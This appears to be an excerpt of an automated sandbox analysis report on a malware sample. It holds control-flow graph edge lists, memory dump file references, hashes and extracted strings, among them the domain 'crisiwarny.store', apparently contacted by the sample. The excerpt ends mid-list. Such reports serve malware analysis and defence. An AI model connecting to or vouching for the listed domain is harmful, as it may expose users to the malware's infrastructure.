                                                                                                      • Instruction Fuzzy Hash: 38D1F17160C3918BC324CF25D4903ABBBE2EBD5308F18C96DE5D98B356D775C90A8B92

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 118 880460-8806bb 119 8806c0-8806f4 118->119 119->119 120 8806f6-88070e 119->120 122 88071c-880736 120->122 123 880715-880717 120->123 125 880740-88076e 122->125 124 880b71-880b7b 123->124 125->125 126 880770-880790 125->126 128 880b49 126->128 129 880a8b-880abb 126->129 130 880b0c-880b15 126->130 131 8808ae-8808bc 126->131 132 880acf 126->132 133 880ac2 126->133 134 8808c3-8808d8 126->134 135 880906-880973 126->135 136 880b67 126->136 137 880b1c-880b2e 126->137 138 880b3e-880b40 126->138 139 8808df-8808ff 126->139 140 880af0-880aff 126->140 141 880ad5-880aeb 126->141 142 880b35 126->142 143 880797-8807c1 126->143 148 880b53 128->148 129->128 129->130 129->132 129->133 129->136 129->137 129->138 129->140 129->141 129->142 145 880b5a-880b61 129->145 146 880b7c 129->146 147 880b83 129->147 129->148 130->128 130->136 130->137 130->138 130->142 130->145 130->146 130->147 130->148 131->128 131->129 131->130 131->132 131->133 131->134 131->135 131->136 131->137 131->138 131->139 131->140 131->141 131->142 131->145 131->146 131->147 131->148 133->132 134->128 134->129 134->130 134->132 134->133 134->135 134->136 134->137 134->138 134->139 134->140 134->141 134->142 134->145 134->146 134->147 134->148 149 880980-8809a5 135->149 151 880b6e 136->151 137->128 137->136 137->138 137->142 137->145 137->146 137->147 137->148 138->128 139->128 139->129 139->130 139->132 139->133 139->135 139->136 139->137 139->138 139->140 139->141 139->142 139->145 139->146 139->147 139->148 155 880b06 140->155 141->140 142->138 144 8807d0-8807f8 143->144 144->144 154 8807fa-880826 144->154 145->136 146->147 161 880b8a 147->161 148->145 149->149 150 8809a7-8809af 149->150 158 8809d1-8809e0 150->158 159 8809b1-8809b9 150->159 151->124 162 880830-88087a 154->162 155->130 164 8809e2-8809e4 158->164 165 880a05-880a25 158->165 163 8809c0-8809cf 159->163 161->161 162->162 166 88087c-880892 162->166 163->158 163->163 167 8809f0-880a01 164->167 168 880a30-880a6d 165->168 171 880897-8808a7 166->171 167->167 169 880a03 167->169 168->168 170 880a6f-880a84 168->170 169->165 170->129 171->128 171->129 171->130 171->131 171->132 171->133 171->134 171->135 171->136 171->137 171->138 171->139 171->140 171->141 171->142 171->145 171->146 171->147 171->148
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1723197918.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723250589.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723269562.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723285160.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723300029.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723397634.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723415099.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723467872.0000000000A59000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723483859.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723500035.0000000000A65000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723517338.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723809098.0000000000A8A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723828156.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723845372.0000000000A8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723885621.0000000000AAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723904125.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723922482.0000000000ABA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723940253.0000000000ABF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723957672.0000000000AC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723973850.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723990319.0000000000ACF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724009256.0000000000AD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724027928.0000000000AD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724045083.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724064498.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724081220.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724102450.0000000000B01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724168291.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724186447.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724205232.0000000000B47000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724223718.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724245108.0000000000B5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724265045.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724322483.0000000000B72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724341878.0000000000B73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: !m%k$#i4g$+e(c$@-+$crisiwarny.store$g!~_$v%r#$y)v'$yw
                                                                                                      • API String ID: 0-2828184888
                                                                                                      • Opcode ID: 5c7339d580ddc57421b073c952d68b073f2793b67ecca346df54a4aaa83c36ca
                                                                                                      • Instruction ID: 9b897cc0728c49bfbe4e2b8e899903649a80a268714f432178849502816ae653
                                                                                                      • Opcode Fuzzy Hash: 5c7339d580ddc57421b073c952d68b073f2793b67ecca346df54a4aaa83c36ca
                                                                                                      • Instruction Fuzzy Hash: 56F176B111C3819FE3249F64DC947ABBBE4FB85300F108A2CEAD99B251D7798845CF92

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 222 8979b0-897a11 223 897a20-897aa9 222->223 223->223 224 897aaf-897af6 223->224 226 897af8-897afd 224->226 227 897aff 224->227 228 897b02-897b2e call 87c880 226->228 227->228 232 897b30-897b32 228->232 233 897b34-897b6b call 87c880 228->233 232->233 236 897b70-897bc2 233->236 236->236 237 897bc4-897bcf 236->237 238 897bf1-897bfe 237->238 239 897bd1-897bd6 237->239 241 897c21-897c2c call 8b46d0 238->241 242 897c00-897c04 238->242 240 897be0-897bef 239->240 240->238 240->240 245 897c31-897c39 241->245 244 897c10-897c1f 242->244 244->241 244->244 246 897de8 245->246 247 897dfd-897eba 245->247 248 897efd-897f1f 245->248 249 897dee-897df4 call 87c890 245->249 250 897c50-897c61 245->250 251 897c40-897c47 245->251 252 897dd0 245->252 253 897dd6-897de0 245->253 258 897ec0-897edb 247->258 254 897f20-897f34 248->254 249->247 255 897c6a 250->255 256 897c63-897c68 250->256 251->250 253->246 254->254 260 897f36-897fc9 254->260 261 897c6c-897d1b call 87c880 255->261 256->261 258->258 259 897edd-897ef5 call 895540 258->259 259->248 264 897fd0-898018 260->264 270 897d20-897d4c 261->270 264->264 267 89801a-89803d call 895390 264->267 275 898045 267->275 270->270 272 897d4e-897d56 270->272 273 897d58-897d5f 272->273 274 897d71-897d7e 272->274 276 897d60-897d6f 273->276 277 897da1-897dc1 call 8b46d0 274->277 278 897d80-897d84 274->278 281 89804b-898054 call 87c890 275->281 276->274 276->276 277->246 277->248 277->249 277->252 277->253 277->275 277->281 286 898060 277->286 287 89806c-898074 call 87c890 277->287 288 898077-898083 277->288 289 898066 277->289 279 897d90-897d9f 278->279 279->277 279->279 281->286 286->289 287->288 289->287
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1723197918.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723250589.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723269562.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723285160.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723300029.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723397634.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723415099.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723467872.0000000000A59000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723483859.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723500035.0000000000A65000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723517338.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723809098.0000000000A8A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723828156.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723845372.0000000000A8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723885621.0000000000AAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723904125.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723922482.0000000000ABA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723940253.0000000000ABF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723957672.0000000000AC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723973850.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723990319.0000000000ACF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724009256.0000000000AD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724027928.0000000000AD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724045083.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724064498.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724081220.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724102450.0000000000B01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724168291.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724186447.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724205232.0000000000B47000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724223718.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724245108.0000000000B5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724265045.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724322483.0000000000B72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724341878.0000000000B73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: DG$Dw$Mx$n~$wE$qVw
                                                                                                      • API String ID: 0-1111290910
                                                                                                      • Opcode ID: bcbd45abd12629b142d1fb11c7cc382b3610d47d0cba588bc54a32987abd9553
                                                                                                      • Instruction ID: 7c33cdef19696095a7d7d9f86dcb0ddf499044f4cf5ccd082ee8ac5e63f7bfcf
                                                                                                      • Opcode Fuzzy Hash: bcbd45abd12629b142d1fb11c7cc382b3610d47d0cba588bc54a32987abd9553
                                                                                                      • Instruction Fuzzy Hash: C3F1BBB16183408FD714DF28D89166BBBE1FF96714F088A2CF4958B391E7788906CB93

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 292 87f755-87f75a 293 87f945 292->293 294 87f9c2-87f9e5 292->294 295 87f801-87f805 292->295 296 87f900-87f913 292->296 297 87f9c0 292->297 298 87f94d-87f956 292->298 299 87f98c-87f992 call 8b0e00 292->299 300 87f80a-87f816 292->300 301 87fa16-87fa1f 292->301 302 87f790-87f79c call 87c7e0 292->302 303 87fa10 292->303 304 87fa50-87fa52 292->304 305 87f81d-87f824 292->305 306 87fa5a-87fa66 292->306 307 87f919-87f925 292->307 308 87f826-87f837 292->308 309 87f8e5 292->309 310 87f761-87f765 292->310 311 87f7a0-87f7fa 292->311 312 87f960-87f964 292->312 313 87fa20-87fa29 292->313 314 87fa2f 292->314 315 87f8ed-87f8f9 292->315 316 87f92c-87f93e 292->316 317 87f9ec-87f9f1 292->317 318 87f76a-87f785 292->318 319 87f9a8-87f9bf 292->319 320 87f973-87f985 292->320 321 87f9fe-87fa0b 292->321 322 87f9f8 292->322 293->298 294->301 294->303 294->304 294->306 294->313 294->314 294->317 294->322 323 87fa92-87fc72 294->323 324 87fcb0-87feb8 294->324 329 87fa38 295->329 296->307 298->312 340 87f997-87f9a1 299->340 300->293 300->294 300->296 300->297 300->298 300->299 300->301 300->303 300->304 300->305 300->306 300->307 300->308 300->309 300->312 300->313 300->314 300->315 300->316 300->317 300->319 300->320 300->321 300->322 301->313 302->311 304->306 330 87f873-87f89f 305->330 307->293 307->294 307->297 307->298 307->299 307->301 307->303 307->304 307->306 307->312 307->313 307->314 307->316 307->317 307->319 307->320 307->321 307->322 307->323 307->324 331 87f840-87f86b 308->331 309->315 326 87fa41-87fa47 310->326 311->293 311->294 311->295 311->296 311->297 311->298 311->299 311->300 311->301 311->303 311->304 311->305 311->306 311->307 311->308 311->309 311->312 311->313 311->314 311->315 311->316 311->317 311->319 311->320 311->321 311->322 337 87f96d 312->337 313->314 314->329 315->296 316->293 316->294 316->297 316->298 316->299 316->301 316->303 316->304 316->306 316->312 316->313 316->314 316->317 316->319 316->320 316->321 316->322 316->323 316->324 317->301 317->303 317->304 317->306 317->313 317->314 317->322 317->323 317->324 318->302 319->297 320->294 320->297 320->299 320->301 320->303 320->304 320->306 320->313 320->314 320->317 320->319 320->322 320->323 320->324 321->312 338 87fc80-87fc95 323->338 341 87fec0-87fed5 324->341 326->304 329->326 344 87f8a0-87f8bd 330->344 331->331 342 87f86d-87f870 331->342 337->320 338->338 346 87fc97-87fca2 338->346 340->294 340->297 340->301 340->303 340->304 340->306 340->313 340->314 340->317 340->319 340->322 340->323 340->324 341->341 347 87fed7-87fedf 341->347 342->330 344->344 348 87f8bf-87f8de 344->348 346->324 350 87fee2 347->350 348->293 348->294 348->296 348->297 348->298 348->299 348->301 348->303 348->304 348->306 348->307 348->309 348->312 348->313 348->314 348->315 348->316 348->317 348->319 348->320 348->321 348->322 348->323 348->324 350->350
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1723197918.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723250589.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723269562.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723285160.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723300029.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723397634.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723415099.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723467872.0000000000A59000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723483859.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723500035.0000000000A65000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723517338.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723809098.0000000000A8A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723828156.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723845372.0000000000A8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723885621.0000000000AAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723904125.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723922482.0000000000ABA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723940253.0000000000ABF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723957672.0000000000AC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723973850.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723990319.0000000000ACF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724009256.0000000000AD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724027928.0000000000AD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724045083.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724064498.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724081220.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724102450.0000000000B01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724168291.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724186447.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724205232.0000000000B47000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724223718.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724245108.0000000000B5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724265045.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724322483.0000000000B72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724341878.0000000000B73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 5c;e$>kjm$A'K)$Jg3i$S;W=$i#E%
                                                                                                      • API String ID: 0-468034204
                                                                                                      • Opcode ID: edffdc168227450e9413c5514e8f03fe6b9114367efcebed707ab97214fd7c40
                                                                                                      • Instruction ID: d7e415dba31c67b55a5d996ed47d6839219b2eef38d34a48081bea0b7e5b376b
                                                                                                      • Opcode Fuzzy Hash: edffdc168227450e9413c5514e8f03fe6b9114367efcebed707ab97214fd7c40
                                                                                                      • Instruction Fuzzy Hash: 591287B4114700CFD3249F26D889FAABBB1FB45310F1686ACD69A9F6B2D770A406CF41

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 352 87e1a0-87e1bf 353 87e1c0-87e1ef 352->353 353->353 354 87e1f1-87e22f 353->354 355 87e230-87e263 354->355 355->355 356 87e265-87e27d call 8afc50 355->356 360 87e485-87e491 356->360 361 87e284-87e286 356->361 362 87e3e2-87e3ea 356->362 363 87e602-87e64f 356->363 364 87e3e0 356->364 365 87e3c0-87e3c5 356->365 366 87e5ee-87e5f2 356->366 367 87e3cc-87e3d4 356->367 368 87e28b-87e3be call 8b3a90 * 12 356->368 369 87e449-87e456 356->369 370 87e5f7 356->370 371 87e3f1-87e415 call 8ac620 call 87e990 356->371 372 87e430-87e436 call 87ec20 356->372 373 87e43f-87e442 356->373 374 87e41e-87e427 call 87ec20 356->374 375 87e5fc 356->375 376 87e498-87e59f 356->376 360->363 360->366 360->370 360->375 360->376 377 87e742-87e749 360->377 378 87e740 360->378 379 87e66f-87e6bf 360->379 380 87e736-87e73b 360->380 382 87e97b-87e985 361->382 362->360 362->363 362->365 362->366 362->367 362->369 362->370 362->371 362->372 362->373 362->374 362->375 362->376 362->377 362->378 362->379 362->380 390 87e650-87e66d 363->390 364->362 365->360 365->363 365->366 365->367 365->370 365->375 365->376 365->377 365->378 365->379 365->380 389 87e976-87e978 366->389 367->364 368->364 386 87e471-87e47e 369->386 387 87e458-87e45a 369->387 370->375 371->374 372->373 373->360 373->363 373->365 373->366 373->367 373->369 373->370 373->375 373->376 373->377 373->378 373->379 373->380 374->372 388 87e5a0-87e5cf 376->388 395 87e8b6-87e8d4 call 87e990 377->395 396 87e962-87e974 call 8ae210 377->396 397 87e952-87e957 377->397 398 87e852-87e859 377->398 399 87e750-87e771 377->399 400 87e810-87e818 377->400 401 87e850 377->401 402 87e860-87e878 377->402 405 87e6c0-87e6dd 379->405 380->378 386->360 386->363 386->366 386->367 386->370 386->375 386->376 386->377 386->378 386->379 386->380 403 87e460-87e46f 387->403 388->388 404 87e5d1-87e5dc call 87f190 388->404 389->382 390->379 390->390 411 87e950 395->411 396->389 412 87e960 397->412 398->395 398->402 417 87e780-87e7c3 399->417 419 87e820-87e82a 400->419 402->396 402->397 408 87e892-87e8b4 402->408 409 87e840-87e84f 402->409 410 87e890 402->410 402->411 402->412 413 87e87f-87e882 402->413 403->386 403->403 427 87e5e1-87e5e7 404->427 405->405 406 87e6df-87e6ea 405->406 420 87e720 406->420 421 87e6ec-87e6f0 406->421 408->409 409->401 411->397 413->410 417->417 426 87e7c5-87e7ce 417->426 419->419 428 87e82c-87e83e 419->428 434 87e728 420->434 429 87e707-87e70b 421->429 431 87e802-87e809 426->431 432 87e7d0-87e7da 426->432 427->363 427->366 427->375 427->377 427->378 427->379 427->380 427->395 427->396 427->397 427->398 427->399 427->400 427->401 427->402 428->401 433 87e70d-87e714 429->433 429->434 431->395 431->397 431->398 431->400 431->401 431->402 436 87e7e7-87e7eb 432->436 437 87e716-87e718 433->437 438 87e71a 433->438 445 87e730 434->445 440 87e800 436->440 441 87e7ed-87e7f4 436->441 437->438 442 87e700-87e705 438->442 443 87e71c-87e71e 438->443 440->431 446 87e7f6-87e7f8 441->446 447 87e7fa 441->447 442->429 442->445 443->442 445->380 446->447 449 87e7e0-87e7e5 447->449 450 87e7fc-87e7fe 447->450 449->431 449->436 450->449
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1723197918.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723250589.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723269562.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723285160.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723300029.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723397634.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723415099.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723467872.0000000000A59000.00000080.00000001.01000000.00000003.sdmpDownload File
